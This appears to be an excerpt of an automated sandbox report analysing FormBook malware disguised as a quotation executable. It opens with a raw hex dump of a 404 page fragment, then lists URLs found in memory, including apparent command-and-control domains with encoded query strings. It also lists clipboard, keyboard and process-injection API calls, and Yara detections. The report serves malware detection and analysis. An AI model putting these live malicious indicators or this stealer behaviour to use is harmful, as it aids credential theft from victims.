74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31

Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008FF8000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004998000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://maximumgroup.co.za/cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008FF8000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004998000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://maximumgroup.co.za/cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q
Source: RAVCpl64.exe, 00000004.00000002.7128342705.000000000918A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004B2A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: RAVCpl64.exe, 00000004.00000002.7128342705.00000000081D6000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000003B76000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736408032.0024940817&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY
Source: RAVCpl64.exe, 00000004.00000002.7111211599.0000000000676000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ogbos88.cyou
Source: RAVCpl64.exe, 00000004.00000002.7111211599.0000000000676000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ogbos88.cyou/kj1o/
Source: RAVCpl64.exe, 00000004.00000002.7128342705.000000000918A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004B2A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zbywl.com/js.js
Source: cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www70.chiro.live/
Source: cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: b427-I_1.5.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082932285.00000000078E2000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.5.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: b427-I_1.5.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RAVCpl64.exe, 00000004.00000002.7128342705.00000000084FA000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000003E9A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: cmdkey.exe, 00000005.00000002.6079587429.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2809330246.0000000002978000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2809481101.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2815143110.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2813644388.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2812292508.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2814129889.0000000002994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: cmdkey.exe, 00000005.00000002.6079587429.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2809330246.0000000002978000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2809481101.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2815143110.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2813644388.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2812292508.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2814129889.0000000002994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: cmdkey.exe, 00000005.00000002.6079587429.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2809330246.0000000002978000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2809481101.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2815143110.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2813644388.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2812292508.0000000002994000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2814129889.0000000002994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: cmdkey.exe, 00000005.00000002.6079587429.0000000002947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: cmdkey.exe, 00000005.00000002.6079587429.000000000292B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
Source: cmdkey.exe, 00000005.00000003.2808430139.0000000007852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008CD4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004674000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ogbos88vip.click
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082932285.00000000078E2000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.5.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082932285.00000000078E2000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.5.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: cmdkey.exe, 00000005.00000002.6081665064.0000000004E4E000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.furrcali.xyz/k29t/?cOnShP=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe
Source: cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: cmdkey.exe, 00000005.00000002.6082932285.00000000078E2000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.5.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
Source: RAVCpl64.exe, 00000004.00000002.7128342705.000000000918A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004B2A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_004FEAFF

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_004FED6A

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

0_2_004FEAFF

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_004EAA57

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_00519576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00519576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2649523005.0000000009250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.6080645951.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.6080568851.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: QUOTATION#050125.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: QUOTATION#050125.exe, 00000000.00000000.2037373598.0000000000542000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_117f284e-6
Source: QUOTATION#050125.exe, 00000000.00000000.2037373598.0000000000542000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d1d3bd2e-f
Source: QUOTATION#050125.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c895445e-b
Source: QUOTATION#050125.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0e2cba21-e

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION#050125.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042CA33 NtClose,	2_2_0042CA33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B90 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03872B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BC0 NtQueryInformationToken,LdrInitializeThunk,	2_2_03872BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872A80 NtClose,LdrInitializeThunk,	2_2_03872A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EB0 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_03872EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D10 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038734E0 NtCreateMutant,LdrInitializeThunk,	2_2_038734E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874260 NtSetContextThread,	2_2_03874260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874570 NtSuspendThread,	2_2_03874570
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B80 NtCreateKey,	2_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BE0 NtQueryVirtualMemory,	2_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B00 NtQueryValueKey,	2_2_03872B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B10 NtAllocateVirtualMemory,	2_2_03872B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B20 NtQueryInformationProcess,	2_2_03872B20
